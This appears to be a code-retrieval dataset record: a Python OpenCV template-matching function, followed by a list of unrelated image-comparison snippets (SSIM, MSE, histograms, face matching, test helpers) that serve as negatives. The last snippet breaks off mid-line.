    reference_img = cv2.imread(reference, 0)
    image_img = cv2.imread(image, 0)
    reference_width, reference_height = reference_img.shape[::-1]
    image_width, image_height = image_img.shape[::-1]
    if reference_width < image_width or reference_height < image_height:
        raise PictureComparatorError("Reference picture must be greater than image to find")
    method = cv2.TM_CCOEFF_NORMED
    # Apply template Matching
    res = cv2.matchTemplate(reference_img, image_img, method)
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
    if max_val > 0.95:
        return Rectangle(max_loc[0], max_loc[1], image_width, image_height)
    else:
        return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compareTo(self,imagefullpath):\n exc = ExtractColor2(self.k)\n bgrcolor = exc.getColorBGR(imagefullpath)\n\n score = 0\n for i in range(self.k):\n score += np.linalg.norm(bgrcolor[i] - self._ref_BGRcolor[i])/(np.sqrt(255*255*3))\n score /= self.k\n return 1 - score", "def __compareImage(self, file1, file2):\n # arg=self.__validateString(str_arg)\n # file1, file2=arg.split(' ', 1)\n try:\n img1 = Image.open(file1)\n img2 = Image.open(file2)\n if img1.size != img2.size:\n return False\n by1 = img1.tobytes()\n by2 = img2.tobytes()\n # format r,g,b,255,r,g,b,255, 3 bytes = 1 point, 255=separator, total 4 bytes\n l = len(by1) / 4\n # total points and same points\n tp = 0\n sp = 0\n for j in range(l):\n i = j * 4\n tp += 1\n if by1[i] == by2[i] and by1[i + 1] == by2[i + 1] and by1[i + 2] == by2[i + 2]:\n sp += 1\n # max to 2% diff allowed\n if tp * 0.98 > sp:\n return False\n else:\n return True\n except Exception, e:\n printLog(self.threadName + \"Exception in __compareImage: %s\" % e.message, logging.ERROR)\n traceback.print_exc()\n return False\n finally:\n img1 = None\n img2 = None", "def image_comparison(self):\n for result in self.cards:\n if result.image_status:\n return True\n return False", "def compare_images(img1_path, img2_path):\n img1 = Image.open(img1_path)\n img2 = Image.open(img2_path)\n try:\n diff = ImageChops.difference(img1, img2)\n except ValueError:\n return False\n return diff.getbbox() is None", "def __lt__(self, img):\r\n ordering = self.config['algorithm_ordering']\r\n ordering = ordering[1:] if ordering.startswith('-') else ordering\r\n\r\n if ordering == \"filename\":\r\n return sorted([self.filename, img.filename])[0] == img.filename\r\n if ordering == 'width':\r\n return self.absolute_width <= img.absolute_width\r\n elif ordering == 'height':\r\n return self.absolute_height <= img.absolute_height\r\n elif ordering == 'area':\r\n return self.absolute_width * self.absolute_height <= img.absolute_width * img.absolute_height\r\n else:\r\n return max(self.absolute_width, self.absolute_height) <= max(img.absolute_width, img.absolute_height)", "def assert_image_equal(path1, path2):\n test_im = np.asarray(Image.open(path1))\n ref_im = np.asarray(Image.open(path2))\n npt.assert_array_equal(test_im, ref_im)", "def compare(image_a, image_b, is_camera_image):\n\n # Generate a unique filename\n filename = uuid.uuid4().hex[:3]\n\n if is_camera_image:\n image_a = imutils.rotate_bound(image_a, 90)\n image_b = imutils.rotate_bound(image_b, 90)\n\n # Store original to show in future\n original = image_a\n\n # Convert to greyscale\n image_a = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n image_b = cv2.cvtColor(image_b, cv2.COLOR_BGR2GRAY)\n\n # Reduce size and blur to account for shaky handheld camera based images\n if is_camera_image:\n scale_multiplier = 0.03125\n image_a = cv2.resize(image_a, (0, 0), fx=scale_multiplier, fy=scale_multiplier)\n image_b = cv2.resize(image_b, (0, 0), fx=scale_multiplier, fy=scale_multiplier)\n image_a = cv2.GaussianBlur(image_a, (1001, 1001), cv2.BORDER_DEFAULT)\n image_b = cv2.GaussianBlur(image_b, (1001, 1001), cv2.BORDER_DEFAULT)\n\n # Obtain SSIM and determine differences\n try:\n _, differences = structural_similarity(image_a, image_b, full=True, gaussian_weights=True)\n except ValueError:\n print('Images are not the same size')\n return None\n\n # Convert to cv2 array\n differences = (differences * 255).astype('uint8')\n\n # Threshold and find contours (differences)\n thresh = cv2.threshold(differences, 0, 255, cv2.THRESH_BINARY_INV | 
cv2.THRESH_OTSU)[1]\n contours = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(contours)\n\n # Draw contours (differences)\n for cont in contours:\n (x, y, w, h) = cv2.boundingRect(cont)\n if is_camera_image:\n multiplier = int(1 / scale_multiplier)\n y *= multiplier\n x *= multiplier\n h *= multiplier\n w *= multiplier\n cv2.rectangle(original, (x, y), (x + w, y + h), (255, 0, 0), 4)\n\n # TODO: Create GIF highlighting differences (instead of statuic image)\n cv2.imwrite('static/images/differences/' + filename + '.jpg', original)\n\n return filename", "def compare_images(self, img1, img2):\n if self.debug:\n cv2.imshow('img1', img1)\n cv2.imshow('img2', img2)\n cv2.waitKey(5)\n time.sleep(2)\n\n # find the mean squared difference between the images\n # http://www.pyimagesearch.com/2014/09/15/python-compare-two-images/\n err = np.sum((img1.astype('float') - img2.astype('float')) ** 2)\n err /= float(img1.shape[0] * img2.shape[1])\n\n # lower is more similar (better)\n return err", "def look_for_reference_image(image):\n match_list = []\n thresh = 8\n final_value = -1\n references = import_reference_images()\n # Initialize the ORB detector algorithm\n orb = cv2.ORB_create()\n\n # Now detect the keypoints and compute\n # the descriptors for the query image\n imgKeypoints, imgDescriptors = orb.detectAndCompute(image, None)\n try:\n for ref in references:\n # Now detect the keypoints and compute\n # the descriptors for the train image\n ref.refKeypoints, ref.refDescriptors = orb.detectAndCompute(ref.img, None)\n\n # Initialize the Matcher for matching\n # the keypoints and then match the\n # keypoints\n matcher = cv2.BFMatcher()\n matches = matcher.knnMatch(imgDescriptors, ref.refDescriptors, k=2)\n\n for m, n in matches:\n if m.distance < 0.75 * n.distance:\n ref.refMatches.append([m])\n\n match_list.append(len(ref.refMatches))\n except:\n pass\n if len(match_list) != 0:\n if max(match_list) > thresh:\n final_value = match_list.index(max(match_list))\n\n return references[final_value].name", "def compare_images(first_img_path, second_img_path):\n img1 = Image.open(first_img_path)\n img2 = Image.open(second_img_path)\n\n diff = ImageChops.difference(img1, img2)\n print(diff.getbbox())", "def img_compare(file1, file2):\n # read image\n img1 = Image.open(file1)\n img2 = Image.open(file2)\n\n # resize \n size = 128, 128\n img1_res = img_resize(img1, size)\n img2_res = img_resize(img2, size)\n\n img1_res.save(\"img_1.thumbnail\", \"JPEG\")\n img2_res.save(\"img_2.thumbnail\", \"JPEG\")\n\n # convert to gray scale\n img1_grayscale = img1_res.convert('LA')\n img1_grayscale.save(\"img_1_grayscale.png\")\n\n img2_grayscale = img2_res.convert('LA')\n img2_grayscale.save(\"img_2_grayscale.png\")\n\n # normalise\n img1_norm = normalize(np.array(img1_grayscale.getdata()).astype(float))\n img2_norm = normalize(np.array(img2_grayscale.getdata()).astype(float))\n\n try:\n # compare two images\n diff = img1_norm - img2_norm\n m_norm = sum(abs(diff)) # Manhattan norm\n z_norm = norm(diff.ravel(), 0) # Zero norm\n\n # print(\"Manhattan norm:\", m_norm, \"/ per pixel:\", m_norm/img1_norm.size)\n # print(\"Zero norm:\", z_norm, \"/ per pixel:\", z_norm*1.0/img1_norm.size)\n\n return m_norm/img1_norm.size, float(z_norm) / img1_norm.size\n except:\n return 100, 100", "def compare_images(img1, img2):\n #normalize scene pixel values\n img1_mean = img1.mean() \n img1_std = img1.std()\n for i in np.nditer(img1, op_flags=['readwrite']):\n i[...] 
= (i-img1_mean)/img1_std\n\n #normalize template pixel values\n img2_mean = img2.mean() \n img2_std = img2.std()\n for i in np.nditer(img2, op_flags=['readwrite']):\n i[...] = (i-img2_mean)/img2_std\n\n #sums error\n error_array = img1 - img2\n error_array = error_array.astype(np.int8)\n ss_error = 0\n for i in np.nditer(error_array):\n ss_error += abs(i/255.0)**0.5\n #print ss_error\n return ss_error", "def __diff_image(self):\n img = cv2.imread(self.imagefile()).copy()\n Reference.__draw_bugs(img, self.__true_positives, False, 1)\n Reference.__draw_bugs(img, self.__false_negatives, (0, 255, 0))\n Reference.__draw_bugs(img, self.__false_positives, (0, 0, 255))\n return img", "def diff_image_feature(image0, image1):\n return 0", "def compare_images(im1, im2):\n errors = (im1 - im2) / 255\n return np.mean(np.square(errors))", "def img_compare(A, B):\r\n A = cv2.GaussianBlur(A, (5, 5), 5)\r\n B = cv2.GaussianBlur(B, (5, 5), 5)\r\n diff = cv2.absdiff(A, B) # absolute difference\r\n _, diff = cv2.threshold(diff, 200, 255, cv2.THRESH_BINARY)\r\n return np.sum(diff)", "def getImageDiff(referenceFrame, frame):\n return cv2.absdiff(referenceFrame, frame)", "def compare_img(img1, img2, err_function=\"ALL\"):\n\n # make sure images are the same shape #\n height1, width1, height2, width2 = img1.shape[0], img1.shape[1], img2.shape[0], img2.shape[1]\n if img1.shape != img2.shape:\n if width1 * height1 > width2 * height2:\n img1 = resize_image(img1, width2, height2)\n else:\n img2 = resize_image(img2, width1, height1)\n # TODO: create better resize to avoid interpolation when possible\n # compare images#\n func_arr = [mse, ssim, L1_norm]\n err_arr = []\n for func in func_arr:\n if err_function == \"ALL\" or func.__name__.upper() == err_function:\n err_arr.append(func(img1, img2))\n return np.array(err_arr)", "def diff_image(images):\n prev_image = cv2.absdiff(images[0], images[1])\n cur_image = cv2.absdiff(images[1], images[2])\n return cv2.bitwise_and(prev_image, cur_image)", "def compare_images(image1, image2, method='diff', *, n_tiles=(8, 8)):\n if image1.shape != image2.shape:\n raise ValueError('Images must have the same shape.')\n\n img1 = img_as_float(image1)\n img2 = img_as_float(image2)\n\n if method == 'diff':\n comparison = np.abs(img2 - img1)\n elif method == 'blend':\n comparison = 0.5 * (img2 + img1)\n elif method == 'checkerboard':\n shapex, shapey = img1.shape\n mask = np.full((shapex, shapey), False)\n stepx = int(shapex / n_tiles[0])\n stepy = int(shapey / n_tiles[1])\n for i, j in product(range(n_tiles[0]), range(n_tiles[1])):\n if (i + j) % 2 == 0:\n mask[i * stepx:(i + 1)*stepx, j * stepy:(j + 1) * stepy] = True\n comparison = np.zeros_like(img1)\n comparison[mask] = img1[mask]\n comparison[~mask] = img2[~mask]\n else:\n raise ValueError('Wrong value for `method`. 
'\n 'Must be either \"diff\", \"blend\" or \"checkerboard\".')\n return comparison", "def cs4243_histmatch(ori_image, refer_image):\n \n ##your code here ###\n\n # get cdf of ori and ref image\n grey_level = 256\n ori_hist, ori_cum_hist, ori_res_image, ori_uni_hist = cs4243_histequ(ori_image, grey_level)\n ref_hist, ref_cum_hist, ref_res_image, ref_uni_hist = cs4243_histequ(refer_image, grey_level)\n \n # map each ori cdf to ref cdf and get the mapped index as matched grey level\n map_value = []\n for i in range(grey_level):\n ori_cdf = ori_cum_hist[i]\n matched_intensity = np.uint8(np.abs(ref_cum_hist - ori_cdf).argmin())\n map_value.append(matched_intensity)\n ##\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist", "def are_compatible_imgs(one_img, another_img):\n return have_same_shapes(one_img, another_img)", "def equals(self, image: 'BaseImage') -> bool:\n assert isinstance(image, BaseImage)\n im1 = pygame.image.tostring(self._surface, 'RGBA')\n im2 = pygame.image.tostring(image._surface, 'RGBA')\n return im1 == im2", "def compare_images(self):\r\n m = round(self.mse(self.image_a, self.image_b), 4)\r\n s = round(ssim(self.image_a, self.image_b) * 100, 5)\r\n return (\r\n m, s)", "def is_equal(image_a, image_b, tolerance=0.0):\n return image_diff_percent(image_a, image_b) <= tolerance", "def image_reference(self, image_id):\n pass", "def apply_and_compare(self, image1_data, image2_data):\n\n return self.transformations_map[self.name](image1_data, image2_data)", "def is_different(image1, image2):\n gray1 = cv2.cvtColor(image1, cv2.COLOR_RGB2GRAY)\n gray2 = cv2.cvtColor(image2, cv2.COLOR_RGB2GRAY)\n\n (score, diff) = compare_ssim(gray1, gray2, full=True)\n diff = (diff * 255).astype(\"uint8\")\n\n thresh = cv2.threshold(diff, 0, 255,\n cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n cnts = cv2.findContours(thresh, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\n return bool(cnts)", "def compare_faces(\n id_image: bytes,\n cam_image: np.ndarray,\n face_location: List[Tuple[int, ...]],\n save_dest: Union[Path, None] = None,\n) -> bool:\n im1 = bytes_to_np(id_image)\n im1 = im1[:, :, ::-1]\n id_face_loc = get_bounding_boxes(im1)\n im1 = im1[:, :, ::-1]\n face_encodings = face_recognition.face_encodings(im1, id_face_loc, 10, \"large\")[0]\n\n im2 = cam_image[:, :, ::-1]\n face_encodings2 = face_recognition.face_encodings(im2, face_location, 10, \"large\")[0]\n\n if save_dest:\n Image.fromarray(im1).save(os.path.join(save_dest, \"face_one.jpeg\"))\n Image.fromarray(im2).save(os.path.join(save_dest, \"face_two.jpeg\"))\n\n dist = face_recognition.face_distance([face_encodings], face_encodings2)[0]\n print(\"[i] Decision threshold is 0.5.\")\n if dist <= 0.5:\n print(\n f\"[+] Distance between the images is {dist}\"\n \"\\n[+] These images are of the same people!\"\n )\n return True\n else:\n print(\n f\"[-] Distance between the images is {dist}\\n\"\n \"[-] These images are of two different people!\"\n )\n return False", "def compare_image_buffers(imgbuf1, imgbuf2):\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = 
Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()", "def create_comparison_image(edge_images):\n if edge_images[0].size == edge_images[1].size:\n height, width = edge_images[0].shape\n overlap_image_a = np.zeros((height, width, 3), np.uint8)\n overlap_image_b = np.zeros((height, width, 3), np.uint8)\n contours, _ = cv2.findContours(edge_images[0], cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contours_b, _ = cv2.findContours(edge_images[1], cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # We could also only compare the n largest contours\n # cnts = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n # cnts_b = sorted(contours_b, key=cv2.contourArea, reverse=True)[:10]\n # Draw the contours red for image_aw\n cv2.drawContours(overlap_image_a, contours, -1, (0, 0, 255), 3)\n # Draw the contours green for image_b\n cv2.drawContours(overlap_image_b, contours_b, -1, (0, 255, 0), 3)\n comparison_image = overlap_image_a + overlap_image_b\n return comparison_image\n else:\n return None", "def matchShapesImages(img1, img2):\n\tcnt1 = findContours(img1)[0]\n\tcnt2 = findContours(img2)[0]\n\tret = cv2.matchShapes(cnt1, cnt2, 1, 0.0)\n\treturn ret", "def compare_image_hashes(image_hash, potential_duplicate_hash):\n\n return image_hash - potential_duplicate_hash < image_hash_comparison_cutoff", "def _diff_images(img_before, img_after):\n width_before, height_before = img_before.size\n width_after, height_after = img_after.size\n data_before = img_before.getdata()\n data_after = img_after.getdata()\n\n width, height = max(width_before, width_after), max(height_before, height_after)\n offset_ax = (width - width_before) // 2\n offset_ay = (height - height_before) // 2\n offset_bx = (width - width_after) // 2\n offset_by = (height - height_after) // 2\n\n diff = 0\n for y in range(height):\n for x in range(width):\n ax, ay = x - offset_ax, y - offset_ay\n bx, by = x - offset_bx, y - offset_by\n if (ax < 0 or bx < 0 or ax >= width_before or bx >= width_after or\n ay < 0 or by < 0 or ay >= height_before or by >= height_after):\n diff += 1\n else:\n if data_before[ax + ay *width_before] != data_after[bx + by * width_after]:\n diff += 1\n try:\n return round(diff / float(width * height), 4)\n except ZeroDivisionError:\n return 0.0", "def assert_image(visual, img, img_name, expected_image_filename, expected_result='equal', threshold=0):\n # Save result image in output folder\n result_file = os.path.join(visual.output_directory, f'{img_name}.png')\n img.save(result_file)\n\n # Output image and expected image must be equal\n expected_image = os.path.join(root_path, 'resources', f'{expected_image_filename}.png')\n compare_image_files(visual, previous_method_name(), result_file, expected_image, expected_result, threshold)", "def test_make_mask_w_ref_image(self):\n output_mask = instance_mask(\n os.path.join(data_dir, 'geotiff_labels.geojson'),\n reference_im=os.path.join(data_dir, 'sample_geotiff.tif'),\n do_transform=True,\n out_file=os.path.join(data_dir, 'test_out.tif')\n )\n truth_mask = skimage.io.imread(os.path.join(data_dir,\n 'sample_inst_mask.tif'))\n saved_output_mask = skimage.io.imread(os.path.join(data_dir,\n 'test_out.tif'))\n\n assert np.array_equal(saved_output_mask, truth_mask)\n # clean up\n os.remove(os.path.join(data_dir, 'test_out.tif'))\n assert np.array_equal(output_mask, truth_mask)", "def compare(actor, frame):\n urlretrieve(actor, 'actor.jpg')\n\n with open(\"frame_image.jpg\", 'wb') as frame_image:\n 
frame_image.write(base64.b64decode(frame[23:]))\n\n actor_encoding = face_encodings(load_image_file('actor.jpg'))[0]\n frame_encoding = face_encodings(load_image_file('frame_image.jpg'))\n\n os.remove('actor.jpg')\n os.remove('frame_image.jpg')\n for encoding in frame_encoding:\n if compare_faces([actor_encoding], encoding):\n return True\n return False", "def what_image_is_this(self, captured_image, reference_images_dictionary, respawn_filter=False):\n matched_array = []\n captured_image_list = captured_image.tolist()\n total = {}\n\n apply_respawn_filter = hasattr(self, 'respawnFilter') and respawn_filter\n\n for item_name, reference_image in reference_images_dictionary.items():\n total[item_name] = 0\n row = 0\n for reference_row in reference_image: # captured_image must not be larger than any reference image\n pixel = 0\n for reference_pixel in reference_row:\n skip = False\n # print(\"Reference Pixel: \" + str(reference_pixel) +\n # \" Captured Pixel: \" + str(captured_image_list[row][pixel][0]))\n if apply_respawn_filter: # apply filter when respawning\n if self.respawnFilter[\"respawn-filter\"][row][pixel] == 0:\n # filter out this pixel, it could be red or white and will be covering the hero\n skip = True\n if not skip:\n total[item_name] += 1\n if reference_pixel == captured_image_list[row][pixel][0]:\n matched_array.append(item_name)\n pixel = pixel + 1\n row = row + 1\n counter = Counter(matched_array)\n most_common = counter.most_common()\n ratios = {}\n for item in most_common:\n ratios[item[0]] = item[1] / total[item[0]]\n return ratios", "def image_comparison(unaligned_image_ccd_lst,aligned_image_ccd_lst,stacked_img_ccd,outputs_path,obsdate):\n source_hdu = CCDData(unaligned_image_ccd_lst[0],unit='adu')\n source_image_hdr = source_hdu.header\n run_filename = source_image_hdr['RUN'].strip(' ')\n target_name = source_image_hdr['FIELD'].strip(' ')\n exptime = source_image_hdr['EXPTIME']\n chip_num = source_image_hdr['CHIP']\n \n # compare unaligned vs aligned images\n for i, unaligned_img in enumerate(unaligned_image_ccd_lst[1:]):\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10), tight_layout=True)\n \n # source_hdu = CCDData(unaligned_image_ccd_lst[0],unit='adu')\n image_hdr = unaligned_img.header\n run_filename = image_hdr['RUN'].strip(' ')\n target_name = image_hdr['FIELD'].strip(' ')\n exptime = image_hdr['EXPTIME']\n chip_num = image_hdr['CHIP']\n \n show_image(unaligned_img, cmap='gray', ax=ax1, fig=fig, percl=90)\n ax1.set_title('Unaligned Image for {}-{}-{}-{}s ({})'.format(run_filename,target_name,chip_num,exptime,obsdate))\n \n show_image(aligned_image_ccd_lst[i], cmap='gray', ax=ax2, fig=fig, percl=90)\n ax2.set_title('Aligned Image for {}-{}-{}-{}s ({})'.format(run_filename,target_name,chip_num,exptime,obsdate))\n \n plt.savefig(outputs_path/\"unaligned_vs_aligned_{}-{}-{}-{}.jpg\".format(run_filename,target_name,chip_num,exptime),dpi=900)\n plt.show()\n \n # compare source image to stacked image\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10), tight_layout=True)\n \n show_image(unaligned_image_ccd_lst[0], cmap='gray', ax=ax1, fig=fig, percl=90)\n ax1.set_title('Unaligned Source Image for {}-{}-{}s ({})'.format(target_name,chip_num,exptime,obsdate))\n \n show_image(stacked_img_ccd, cmap='gray', ax=ax2, fig=fig, percl=90)\n ax2.set_title('Aligned Stacked Image for {}-{}-{}s ({})'.format(target_name,chip_num,exptime,obsdate))\n \n plt.savefig(outputs_path/\"source_vs_stacked_{}-{}-{}.jpg\".format(target_name,chip_num,exptime),dpi=900)\n plt.show()", 
"def diff_image_color(image_path0, image_path1):\n image0 = Image.open(image_path0)\n #color_image0 = get_histogram(image0)\n color_image0 = image0.histogram()\n cut_color_image0 = cut_histogram_min(color_image0)\n image1 = Image.open(image_path1)\n color_image1 = image1.histogram()\n #color_image1 = get_histogram(image1)\n cut_color_image1 = cut_histogram_min(color_image1)\n color_difference = bhattacharyya(color_image0, color_image1)\n return color_difference", "def findMatchesBetweenImages(image_1, image_2):\n # matches - type: list of cv2.DMath\n matches = None\n # image_1_kp - type: list of cv2.KeyPoint items.\n image_1_kp = None\n # image_1_desc - type: numpy.ndarray of numpy.uint8 values.\n image_1_desc = None\n # image_2_kp - type: list of cv2.KeyPoint items.\n image_2_kp = None\n # image_2_desc - type: numpy.ndarray of numpy.uint8 values.\n image_2_desc = None\n # WRITE YOUR CODE HERE.\n\n sift = cv2.ORB_create()\n image_1_kp, image_1_desc = sift.detectAndCompute(image_1, None)\n image_2_kp, image_2_desc = sift.detectAndCompute(image_2, None)\n\n # bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # matches = bf.match(image_1_desc, image_2_desc)\n # matches = sorted(matches, key = lambda x:x.distance)\n # matches = matches[:10]\n\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(image_1_desc, image_2_desc, k=2)\n\n # Apply ratio test\n good = []\n for m, n in matches:\n print(m.distance, n.distance, m.distance < .75*n.distance)\n if m.distance < (0.75 * n.distance):\n good.append([m])\n\n # We coded the return statement for you. You are free to modify it -- just\n # make sure the tests pass.\n print(len(good), good)\n return image_1_kp, image_2_kp, matches\n # END OF FUNCTION.", "def compare_images(self, df):\n score_list = []\n elapsed_list = []\n for index,row in df.iterrows():\n start_time = time.time()\n image1 = imread(row['image1'],as_gray=\"True\")\n image2 = imread(row['image2'],as_gray=\"True\")\n if(image1.shape != image2.shape):\n image2 = resize(image2, (image1.shape)) # if images are of different dimensions, crop the second image based on first\n score = structural_similarity(image1, image2)\n new_score = self.__convert_similarity_score(score)\n elapsed_time = (time.time() - start_time)\n score_list.append(round(new_score,2))\n elapsed_list.append(elapsed_time)\n output_df = self.__create_output_csv(df, score_list, elapsed_list)\n return output_df", "def __eq__(*args, **kwargs):\n return _gdi_.Bitmap___eq__(*args, **kwargs)", "def compare_cpes(lhs: ImageCpe, rhs: ImageCpe):\n vendor_cmp = compare_fields(lhs.vendor, rhs.vendor)\n if vendor_cmp != 0:\n return vendor_cmp\n\n name_cmp = compare_fields(lhs.name, rhs.name)\n if name_cmp != 0:\n return name_cmp\n\n version_cmp = compare_fields(lhs.version, rhs.version)\n if version_cmp != 0:\n return version_cmp\n\n update_cmp = compare_fields(lhs.update, rhs.update)\n if update_cmp != 0:\n return update_cmp\n\n meta_cmp = compare_fields(lhs.meta, rhs.meta)\n if meta_cmp != 0:\n return meta_cmp\n\n # all avenues of comparison have been depleted, the two cpes are same for all practical purposes\n return 0", "def __eq__(self, other):\n if not isinstance(other, ImageInfo):\n return False\n\n return self.__dict__ == other.__dict__", "def mostrar_imagem_equalizada(self):\n self.imagem_core.equalizar_imagem()\n self.recarregar_imagem()", "def _compare_jpg_decode_with_pil(test_case, images, print_debug_info=False):\n of_decoded_images = _of_image_decode(images)\n pil_images = [Image.open(image) for image in images]\n # convert 
image to BGR\n pil_decoded_images = [np.array(image)[:, :, ::-1] for image in pil_images]\n\n for of_decoded_image, pil_decoded_image in zip(\n of_decoded_images, pil_decoded_images\n ):\n of_decoded_image = of_decoded_image.squeeze()\n test_case.assertTrue(len(of_decoded_image.shape) == 3)\n test_case.assertTrue(len(pil_decoded_image.shape) == 3)\n\n diff = of_decoded_image - pil_decoded_image\n diff_index = np.where(diff != 0)\n diff_abs_values = diff[diff_index]\n\n if print_debug_info:\n print(\"of_decoded_image:\\n\", of_decoded_image, of_decoded_image.shape)\n print(\"pil_decoded_image:\\n\", pil_decoded_image, pil_decoded_image.shape)\n print(\"diff_index:\\n\", diff_index)\n print(\"diff_abs_values:\\n\", diff_abs_values)\n print(\n \"of_decoded_image diff:\\n\",\n of_decoded_image[diff_index[0], diff_index[1]],\n )\n print(\n \"pil_decoded_image diff:\\n\",\n pil_decoded_image[diff_index[0], diff_index[1]],\n )\n\n # only green channel has difference of 1\n test_case.assertTrue(np.all(diff_index[-1] == 1))\n test_case.assertTrue(np.all(diff_abs_values == 1))", "def similarity_two_images_color(img1: np.ndarray, img2: np.ndarray) -> np.ndarray:\n hist_image_1 = histogram_of_image_color(img1, HIST_BINS_INTENSITY, BIN_DIFFERENCE_INTENSITY_HALF)\n hist_image_2 = histogram_of_image_color(img2, HIST_BINS_INTENSITY, BIN_DIFFERENCE_INTENSITY_HALF)\n max_difference = max(2 * np.sum(hist_image_1), 2 * np.sum(hist_image_2))\n return 100 - 100 * np.sum(np.absolute(hist_image_1 - hist_image_2)) / max_difference", "def verify_image(self, image_location):\n checksum = self._hash_algo.hexdigest()\n LOG.debug('Verifying image at %(image_location)s against '\n '%(algo_name)s checksum %(checksum)s',\n {'image_location': image_location,\n 'algo_name': self._hash_algo.name,\n 'checksum': checksum})\n if checksum != self._expected_hash_value:\n error_msg = errors.ImageChecksumError.details_str.format(\n image_location, self._image_info['id'],\n self._expected_hash_value, checksum)\n LOG.error(error_msg)\n raise errors.ImageChecksumError(image_location,\n self._image_info['id'],\n self._expected_hash_value,\n checksum)", "def test_RGB_mode():\n\n model = Instafilter(\"Lo-Fi\")\n\n f_image = __local__ / \"Normal.jpg\"\n\n img1 = model(f_image)\n img2 = model(f_image, is_RGB=True)\n\n diff = (img1 - img2).sum()\n\n assert abs(diff) > 0", "def magick_compare(self) -> None:\n # Make diff images\n if len(self.clips) > 2:\n Status.fail(f'{self.__class__.__name__}: \"magick_compare\" can only be used with two clips!', exception=ValueError)\n\n self.path_diff = self.path / 'diffs'\n try:\n subprocess.call(['magick', 'compare'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)\n self.path_diff.mkdir(parents=True)\n except FileNotFoundError as file_not_found:\n Status.fail(\n f'{self.__class__.__name__}: \"magick compare\" was not found!',\n exception=FileNotFoundError, chain_err=file_not_found\n )\n except FileExistsError as file_err:\n Status.fail(\n f'{self.__class__.__name__}: {self.path_diff.to_str()} already exists!',\n exception=FileExistsError, chain_err=file_err\n )\n\n all_images = [sorted((self.path / name).glob('*.png')) for name in self.clips.keys()]\n images_a, images_b = all_images\n\n cmds = [\n f'magick compare \"{i1.to_str()}\" \"{i2.to_str()}\" '\n + f'\"{self.path_diff.to_str()}/diff_' + f'{f}'.zfill(len(\"%i\" % self.max_num)) + '.png\"'\n for i1, i2, f in zip(images_a, images_b, self.frames)\n ]\n\n # Launch asynchronously the Magick commands\n Status.info('Diffing clips...')\n print()\n 
SubProcessAsync(cmds)", "def checkImages(self):\r\n\r\n self.leftImage, self.rightImage, res = self.receiver.getImageData()\r\n\r\n return res", "def compare_images(originalImg, modifiedImg):\n fig, axes = plt.subplots(nrows=1, ncols=2, sharex='all', sharey='all',dpi=144)\n # ax = axes.ravel()\n\n psnr_orig = msr.compare_psnr(originalImg, originalImg)\n ssim_orig = msr.compare_ssim(\n originalImg, originalImg, multichannel=True)\n\n psnr_mod = msr.compare_psnr(originalImg, modifiedImg)\n ssim_mod = msr.compare_ssim(\n originalImg, modifiedImg, multichannel=True)\n\n label = 'PSNR: {:.2f}, SSIM: {:.2f}'\n\n axes[0].imshow(originalImg, cmap=plt.cm.gray)\n axes[0].set_xlabel(label.format(psnr_orig, ssim_orig))\n axes[0].set_title('Original image')\n\n axes[1].imshow(modifiedImg, cmap=plt.cm.gray)\n axes[1].set_xlabel(label.format(psnr_mod, ssim_mod))\n axes[1].set_title('Modified image')\n\n plt.show()", "def assert_img_equal(request):\n\n testname = request.node.name\n filename = Path(request.module.__file__)\n test_dir = filename.parent / filename.stem\n test_dir.mkdir(exist_ok=True)\n\n def _img_equal(img, index=0):\n expected_file = test_dir / f\"{testname}_{index}.png\"\n actual_file = test_dir / f\"{testname}_{index}_actual.png\"\n if img.ndim == 2:\n cv2.imwrite(str(actual_file), img)\n else:\n img_bgr = img.copy()\n img_bgr[..., :3] = img_bgr[..., :3][..., ::-1]\n cv2.imwrite(str(actual_file), img_bgr) # img is RGB, imwrite expects BGR\n\n if not expected_file.exists():\n raise AssertionError(\n f\"{expected_file} does not exist! Check newly produced img with a command like:\\n\\n feh {actual_file}\\n\\n\"\n )\n\n try:\n pytest.helpers.assert_img_equal(expected_file, img)\n except Exception as e:\n raise AssertionError(f\"{expected_file} differs from {actual_file}\") from e\n\n return _img_equal", "def compare_files(_img1, _img2, _network, verbose=False):\n \n face_dsts = []\n \n descs1 = calculate_embeddings_from_buffer(_img1, _network, verbose=verbose)\n descs2 = calculate_embeddings_from_buffer(_img2, _network, verbose=verbose)\n\n for desc1 in descs1:\n (emb1, det1) = (desc1.emb, desc1.det)\n for desc2 in descs2:\n (emb2, det2) = (desc2.emb, desc2.det)\n (dist, match_faces) = compare_embeddings(emb1, emb2)\n face_dsts.append((dist, match_faces, det1, det2))\n \n return face_dsts", "def same_landmark_images(path_1: str, path_2: str) -> float:\n img_1_greyscale = read_image_greyscale(path_1)\n img_2_greyscale = read_image_greyscale(path_2)\n img_1_rgb_separated = np.array([read_image_color(path_1, component) for component in RGB_COMPONENTS])\n img_2_rgb_separated = np.array([read_image_color(path_2, component) for component in RGB_COMPONENTS])\n\n similarity_hog = similarity_two_images_hog(img_1_greyscale, img_2_greyscale)\n similiarities_rgb = np.array([similarity_two_images_color(img_1_rgb_separated[i], 